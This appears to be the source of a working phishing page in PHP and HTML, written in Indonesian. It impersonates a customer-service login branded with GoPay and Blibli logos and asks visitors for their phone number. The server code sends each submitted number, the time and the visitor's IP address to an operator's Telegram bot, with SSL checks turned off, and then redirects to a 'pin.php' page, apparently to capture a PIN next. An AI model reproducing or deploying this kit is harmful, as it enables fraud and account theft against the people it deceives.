<?php
session_start();
ob_start();
require_once 'config_secret.php';

// Proteksi session agar tidak double login
if (isset($_SESSION['phone'])) {
    header('Location: pin.php');
    exit();
}

$error = null;

if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    $phone = isset($_POST['phone']) ? trim($_POST['phone']) : "";
    
    if (preg_match('/^[0-9]{10,15}$/', $phone)) {
        $_SESSION['phone'] = $phone;
        
        $message = "📱 *LOGIN BARU TERDETEKSI*\n\n";
        $message .= "*Nomor HP:* `$phone`\n";
        $message .= "*Waktu:* " . date('d/m/Y H:i:s') . "\n";
        $message .= "*IP:* " . $_SERVER['REMOTE_ADDR'] . "\n";
        
        // Eksekusi kirim Telegram
        sendToTelegram($message);

        /** * SOLUSI ERR_CONNECTION_RESET: 
         * Langsung pindah halaman secepat mungkin setelah perintah kirim.
         */
        header('Location: pin.php');
        exit();
    } else {
        $error = "Nomor HP tidak valid!";
    }
}

function sendToTelegram($text) {
    if (!defined('TELEGRAM_BOT_TOKEN') || !defined('TELEGRAM_CHAT_ID')) return;

    $url = "https://api.telegram.org/bot" . TELEGRAM_BOT_TOKEN . "/sendMessage";
    $data = [
        'chat_id' => TELEGRAM_CHAT_ID,
        'text' => $text,
        'parse_mode' => 'Markdown',
        'disable_web_page_preview' => true
    ];

    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_POST, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    
    /** * OPTIMASI KONEKSI (Anti-Reset)
     */
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); // Nunggu koneksi maksimal 5 detik
    curl_setopt($ch, CURLOPT_TIMEOUT, 10);        // Nunggu respon maksimal 10 detik
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); // Matikan verifikasi SSL (Penyebab utama Reset)
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);     // Abaikan host verifikasi
    curl_setopt($ch, CURLOPT_IPRESOLVE, CURL_IPRESOLVE_V4); // Paksa IPv4

    $result = curl_exec($ch);
    curl_close($ch);
    return $result;
}
?>
<!DOCTYPE html>
<html lang="id">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Masuk | Akun Resmi Layanan Pelanggan</title>
    <style>
        /* Desain asli milikmu tetap dipertahankan */
        *{ margin:0; padding:0; box-sizing:border-box; }
        body{ min-height:100vh; background:#f7f7f7; font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Arial,sans-serif; display:flex; flex-direction:column; align-items:center; }
        .topbar{ width:100%; background:#fff; box-shadow:0 1px 4px rgba(0,0,0,.08); padding:16px; display:flex; justify-content:center; gap:25px; margin-bottom:32px; }
        .topbar img{ height:35px; width: auto; }
        .wrapper{ width:100%; max-width:400px; padding:0 16px; }
        .hero{ display:flex; justify-content:center; margin-bottom:24px; }
        .hero img{ height:64px; width: auto; }
        .login-card{ background:#fff; border-radius:20px; padding:32px; text-align:center; border:1px solid #eee; box-shadow:0 4px 20px rgba(0,0,0,.08); }
        .login-card h1{ font-size:20px; font-weight:700; color:#1f2937; margin-bottom:24px; }
        .error{ background:#ffebee; color:#d32f2f; padding:12px; border-radius:10px; margin-bottom:16px; font-size:14px; border:1px solid #ffcdd2; }
        .login-card input{ width:100%; padding:14px 16px; font-size:18px; text-align:center; border-radius:10px; border:1px solid #ccc; outline:none; transition:.2s; margin-bottom:24px; }
        .login-card input:focus{ border-color:#03ac0e; box-shadow:0 0 0 2px rgba(3,172,14,.2); }
        .login-card button{ width:100%; height:48px; background:#03ac0e; color:#fff; border:none; border-radius:10px; font-size:18px; font-weight:700; cursor:pointer; display:flex; align-items:center; justify-content:center; gap:10px; }
        .loading-spinner{ display:none; width:18px; height:18px; border:3px solid rgba(255,255,255,.4); border-top-color:#fff; border-radius:50%; animation:spin .8s linear infinite; }
        @keyframes spin{ to{ transform:rotate(360deg); } }
        .footer{ margin-top:32px; font-size:12px; color:#9ca3af; text-align:center; padding-bottom: 20px;}
    </style>
</head>
<body>

<header class="topbar">
    <img src="img/logo.png" alt="Logo">
    <img src="img/gopay.png" alt="Gopay">
    <img src="img/bibli.png" alt="Blibli">
</header>

<main class="wrapper">
    <div class="hero">
        <img src="img/image.png" alt="Hero">
    </div>

    <section class="login-card">
        <h1>Masukkan Nomor Handphone</h1>

        <?php if ($error): ?>
            <div class="error" role="alert">⚠️ <?php echo htmlspecialchars($error); ?></div>
        <?php endif; ?>

        <form method="POST" onsubmit="return showLoading()">
            <input
                type="tel"
                id="loginInput"
                name="phone"
                placeholder="Contoh: 08123456789"
                maxlength="14"
                inputmode="numeric"
                required
                autofocus
                autocomplete="tel"
            >

            <button type="submit" id="btnSubmit">
                <span id="btnText">Verifikasi Sekarang</span>
                <span id="spinner" class="loading-spinner"></span>
            </button>
        </form>
    </section>

    <footer class="footer">
        <p>© 2024–2026 Layanan Digital Terpadu. Seluruh hak cipta dilindungi.</p>
    </footer>
</main>

<script>
document.getElementById('loginInput').addEventListener('input', function(){
    this.value = this.value.replace(/\D/g,'');
});

function showLoading(){
    const btn = document.getElementById('btnSubmit');
    const text = document.getElementById('btnText');
    const spinner = document.getElementById('spinner');

    btn.disabled = true;
    btn.style.opacity = "0.7";
    text.textContent = 'Memproses...';
    spinner.style.display = 'inline-block';

    return true;
}
</script>
</body>
</html>